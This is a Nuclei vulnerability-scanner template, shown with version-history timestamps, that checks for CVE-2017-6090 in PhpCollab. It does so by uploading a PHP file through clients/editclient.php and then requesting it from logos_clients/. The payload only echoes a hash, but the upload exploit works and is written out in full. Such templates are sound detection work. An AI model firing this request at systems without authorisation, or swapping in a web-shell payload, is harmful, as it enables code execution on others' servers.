nuclei-templates/http/cves/2017/CVE-2017-6090.yaml

57 lines
1.9 KiB
YAML
Raw Normal View History

2021-07-27 09:51:01 +00:00
id: CVE-2017-6090
info:
name: PhpColl 2.5.1 Arbitrary File Upload
2021-07-27 09:51:01 +00:00
author: pikpikcu
severity: high
description: PhpCollab 2.5.1 and earlier allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in logos_clients/ via clients/editclient.php.
2023-09-06 13:22:34 +00:00
remediation: |
Apply the latest patch or upgrade to a newer version of PhpColl to mitigate this vulnerability.
reference:
- https://sysdream.com/news/lab/2017-09-29-cve-2017-6090-phpcollab-2-5-1-arbitrary-file-upload-unauthenticated/
- https://nvd.nist.gov/vuln/detail/CVE-2017-6090
- https://www.exploit-db.com/exploits/42934/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2017-6090
cwe-id: CWE-434
2023-08-31 11:46:18 +00:00
epss-score: 0.97282
epss-percentile: 0.9978
2023-09-06 13:22:34 +00:00
cpe: cpe:2.3:a:phpcollab:phpcollab:*:*:*:*:*:*:*:*
2022-07-10 09:37:56 +00:00
metadata:
max-request: 2
2023-07-11 19:49:27 +00:00
vendor: phpcollab
product: phpcollab
2023-09-06 13:22:34 +00:00
shodan-query: http.title:"PhpCollab"
2022-08-31 19:22:43 +00:00
tags: cve2017,phpcollab,rce,fileupload,edb,cve,intrusive
2021-07-27 09:51:01 +00:00
http:
2021-07-27 09:51:01 +00:00
- raw:
2023-07-05 07:50:14 +00:00
- |
2021-07-27 12:10:51 +00:00
POST /clients/editclient.php?id={{randstr}}&action=update HTTP/1.1
2021-07-27 09:51:01 +00:00
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=---------------------------154934846911423734231554128137
-----------------------------154934846911423734231554128137
2021-07-27 12:20:49 +00:00
Content-Disposition: form-data; name="upload"; filename="{{randstr}}.php"
2021-07-27 09:51:01 +00:00
Content-Type: application/x-php
2021-07-27 12:20:49 +00:00
<?php echo md5('phpcollab_rce');?>
2021-07-27 09:51:01 +00:00
-----------------------------154934846911423734231554128137--
2023-07-05 07:50:14 +00:00
- |
GET /logos_clients/{{randstr}}.php HTTP/1.1
2021-07-27 09:51:01 +00:00
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
2021-07-27 12:20:49 +00:00
words:
- "48dbd2384cb6b996fa1e2855c7f0567f"
2021-07-27 09:51:01 +00:00
- type: status
status:
- 200